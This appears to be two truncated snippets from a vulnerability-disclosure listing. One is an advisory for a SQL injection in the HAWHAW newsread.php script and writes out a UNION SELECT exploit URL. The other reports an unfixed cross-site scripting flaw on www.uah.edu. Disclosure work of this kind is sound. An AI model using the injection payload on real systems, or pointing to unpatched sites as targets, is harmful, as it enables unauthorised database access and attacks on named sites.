HAWHAW SQL Injection

o-o HAWHAW C o-o Download: http://www.hawhaw.de/download o-o Vendor: www.hawhaw.de o-o Author: s4r4d0 o-o mail: [email protected] o-o Bug: Sql Injection has benn found on newsread.php file. o-o Exploit: http://host/wap/newsread.php?storyid=-1+UNION+SELECT+1,@@version,3,4 o-o Demo:...

Unfixed XSS vulnerability at www.uah.edu

Security researcher Dark.Man, has submitted on 24/08/2009 a cross-site-scripting XSS vulnerability affecting www.uah.edu, which at the time of submission ranked 49848 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 04/07/2010. It is currently...